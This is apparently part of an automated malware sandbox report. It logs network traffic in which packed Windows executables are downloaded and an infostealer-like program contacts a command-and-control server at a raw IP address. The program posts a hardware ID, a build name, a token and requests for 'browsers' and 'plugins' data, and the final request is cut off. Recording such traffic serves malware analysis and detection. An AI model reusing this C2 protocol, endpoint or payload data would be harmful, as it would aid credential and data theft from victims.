00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 cd 01 00 00 20 00 00 00 ce 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 00 02 00 00 06 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 02 00 00 02 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 40 02 00 00 10 05 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 07 00 00 10 05 00 00 ec 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:17 GMTContent-Type: application/octet-streamContent-Length: 1888256Last-Modified: Fri, 07 Feb 2025 02:54:38 GMTConnection: keep-aliveETag: "67a575ee-1cd000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ae 00 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 da 70 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 68 61 79 77 69 6d 63 00 10 1a 00 00 40 30 00 00 0a 1a 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 62 62 76 6b 75 68 70 00 10 00 00 00 50 4a 00 00 04 00 00 00 aa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 ae 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:23 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:28 GMTContent-Type: application/octet-streamContent-Length: 1764352Last-Modified: Sat, 08 Feb 2025 12:04:50 GMTConnection: keep-aliveETag: "67a74862-1aec00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 15 88 a0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 7e 01 00 00 64 00 00 00 00 00 00 00 b0 45 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 45 00 00 04 00 00 da 99 1b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 91 45 00 57 00 00 00 55 10 02 00 69 00 00 00 00 00 02 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 02 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 01 00 00 10 00 00 00 d8 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 0c 04 00 00 00 00 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 02 00 00 02 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 29 00 00 20 02 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 66 72 71 61 62 68 6b 00 e0 19 00 00 c0 2b 00 00 d6 19 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6c 73 6c 64 6b 62 7a 00 10 00 00 00 a0 45 00 00 04 00 00 00 c6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 45 00 00 22 00 00 00 ca 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:34 GMTContent-Type: application/octet-streamContent-Length: 1823232Last-Modified: Sat, 08 Feb 2025 18:33:41 GMTConnection: keep-aliveETag: "67a7a385-1bd200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 48 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 48 00 00 04 00 00 fe 74 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2b 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 74 79 77 72 70 6a 70 00 e0 1a 00 00 40 2d 00 00 de 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 6c 66 72 6d 79 6e 64 00 20 00 00 00 20 48 00 00 06 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 48 00 00 22 00 00 00 b0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:23:39 GMTContent-Type: application/octet-streamContent-Length: 1815552Last-Modified: Sat, 08 Feb 2025 19:00:15 GMTConnection: keep-aliveETag: "67a7a9bf-1bb400"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 00 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 48 00 00 04 00 00 dd 55 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 29 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 68 69 64 74 78 6e 75 00 f0 18 00 00 00 2f 00 00 ee 18 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6d 73 62 6e 6c 77 70 00 10 00 00 00 f0 47 00 00 04 00 00 00 8e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 48 00 00 22 00 00 00 92 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /sok33tn HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 30 46 45 44 36 34 36 39 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 2d 2d 0d 0a Data Ascii: ------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="hwid"2D0FED6469FB4109353171------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="build"reno------AKJDGDGDHDGDBFIDHDBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="message"browsers------JKJDAEBFCBKECBGDBFCF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 2d 2d 0d 0a Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"44ab90bb59c107368dff8c75898e7229381ba4c671da6a837918c6bd8113fb79712e3d76------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="message"plugins------FBKKJEBFIDAEBFHIDAEB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGHHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 34 61 62 39 30 62 62 35 39 63 31 30 37 33 36 38 64 66 66 38 63 37 35 38 39 38 65 37 32 32 39 33 38 31 62 61 34 63 36 37 31 64 61 36 61 38 33 37 39 31 38 63 36 62 64 38 31 31 33 66 62 37 39 37 31 32 65 33 64 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; 